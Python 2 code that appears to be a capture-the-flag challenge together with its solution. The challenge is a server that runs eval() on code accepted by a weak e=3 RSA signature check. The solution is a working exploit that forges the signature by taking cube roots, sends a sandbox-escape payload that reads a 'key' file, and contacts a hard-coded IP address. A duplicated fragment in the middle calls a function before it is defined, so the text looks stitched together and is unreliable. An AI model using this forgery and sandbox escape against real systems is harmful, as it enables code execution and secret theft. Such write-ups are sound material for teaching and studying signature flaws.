#!/usr/bin/python -u
import sys
import struct
import os
import hashlib
 
def strtonum(s):
  ret = 0
  for h in s:
    ret *= 256
    ret |= ord(h)
  return ret
 
def numtostr(s, l):
  ret = ""
  for i in range(0, l):
    ret = chr(s&0xFF) + ret
    s >>= 8
  return ret
 
port = 1234
 
# RSA modulus(factor me)
N = 0xc3542f8b7b2c9f083912972d8d07312fce5cf549ae8b25e97a691d35a72f953dad939811e1ec4d46fafd5db3034fee45c5f700a57915a67238925361b3ea7ae58e392b92d13af8e1604298794f640db466642933825813bf329b228f773a5137a625bd23ffa1d8bb7ca9b49d6235a0e4f839226f14a9e7a42fa4f7d530725803
 
print "WE ONLY RUN SIGNED CODE, DO YOU HAVE SIGNED CODE?"
l = struct.unpack("I", sys.stdin.read(4))[0]
hashee = sys.stdin.read(0x80)
msg = numtostr(pow(strtonum(hashee), 3, N), 0x80)
code = sys.stdin.read(l)
if msg[0:4] != "\x00\x01\xFF\xFF":
  print "BAD PADDING"
  sys.exit(0)
h = hashlib.sha1(code).digest()
if msg[len(msg)-len(h):] != h:
  print "BAD HASH"
  sys.exit(0)
eval(code)

hn = strtonum(h) # hn is a number representation of the sha hash
rsuf = 0
rpow = 1
print 'Find suf for ',hn
nsuf = 22
for i in xrange(nsuf):
	jFound = None
	for j in xrange(256):
		n = pow(rsuf + rpow*j,3);
		if (n-hn) % (256*rpow) == 0:
			jFound=j
			break
	if not (jFound is None):
		rsuf +=rpow * jFound
		rpow*=256;
	else:
		print 'not found'
		raise "Cannot find suffix";
rsuf%=pow(256,nsuf)
print 'Done, found: ',rsuf

rmin = strtonum('\x00\x01\xFF\xFF'+('\x00'*(124-len(h)))+h)
z=find_invpow(rmin,3)
r=(z+pow(256,nsuf)-(z%pow(256,nsuf)))+(rsuf) # add pow(256,nsuf) just to make sure that r is larger than z.

import sys
import struct
import os
import hashlib
import socket
 
def strtonum(s):
  ret = 0
  for h in s:
    ret *= 256
    ret |= ord(h)
  return ret
 
def numtostr(s, l):
  ret = ""
  for i in range(0, l):
    ret = chr(s&0xFF) + ret
    s >>= 8
  return ret
 
def hexV(s):
	return str(len(s))+"#"+(":".join("{0:x}".format(ord(c)) for c in s))
 
N = 0xc3542f8b7b2c9f083912972d8d07312fce5cf549ae8b25e97a691d35a72f953dad939811e1ec4d46fafd5db3034fee45c5f700a57915a67238925361b3ea7ae58e392b92d13af8e1604298794f640db466642933825813bf329b228f773a5137a625bd23ffa1d8bb7ca9b49d6235a0e4f839226f14a9e7a42fa4f7d530725803
 
code = """[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print'](open(os.path.dirname(os.path.realpath(__file__))+'/key').read(1024))
 
 
 
 
 
 
 
 
"""
 
def find_invpow(x,n):
    """Finds the integer component of the n'th root of x,
    an integer such that y ** n <= x < (y + 1) ** n.
    """
    high = 1
    while high ** n < x:
        high *= 2
    low = high/2
    while low <= high:
        mid = (low + high) // 2
        if mid**n < x:
            low = mid +1
        else:
            high = mid -1
    return low 
 
 
h = ("\x00"*2)+hashlib.sha1(code).digest()
print 'Hash: ',hexV(h),'\n'
hn = strtonum(h)
rsuf = 0
rpow = 1
print 'Find suf for ',hn
nsuf = 22
for i in xrange(nsuf):
	jFound = None
	for j in xrange(256):
		n = pow(rsuf + rpow*j,3);
		if (n-hn) % (256*rpow) == 0:
			jFound=j
			break
	if not (jFound is None):
		rsuf +=rpow * jFound
		rpow*=256;
	else:
		print 'not found'
		raise "Cannot find suffix";
rsuf%=pow(256,nsuf)
print 'Done, found: ',rsuf
print 'Test: rsuf^3-hn % (256^`nsuf`) = ',(pow(rsuf,3)-hn)%pow(256,nsuf),'\n'
 
rmin = strtonum('\x00\x01\xFF\xFF'+('\x00'*(124-len(h)))+h)
z=find_invpow(rmin,3)
print hexV(numtostr(pow(z,3),0x80))
 
r=(z+pow(256,nsuf)-(z%pow(256,nsuf)))
 
r=(z+pow(256,nsuf)-(z%pow(256,nsuf)))+(rsuf)
print 'Test: r^3-hn % (256^`nsuf`) = ',(pow(r,3)-hn)%pow(256,nsuf),'\n'
 
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('54.234.73.81', 1234))
data = client_socket.recv(128)
print data
mess = struct.pack("I",len(code))
if len(mess)!=4:
	System.exit()
mess +=numtostr(r,0x80)
mess +=code
f=open("/tmp/f","wb")
f.write(mess)
f.close()
try :
    client_socket.sendall(mess)
except socket.error:
    print 'Send failed'
    sys.exit()
print 'sent'
data = client_socket.recv(128)
client_socket.close()
print 'RECV: ',data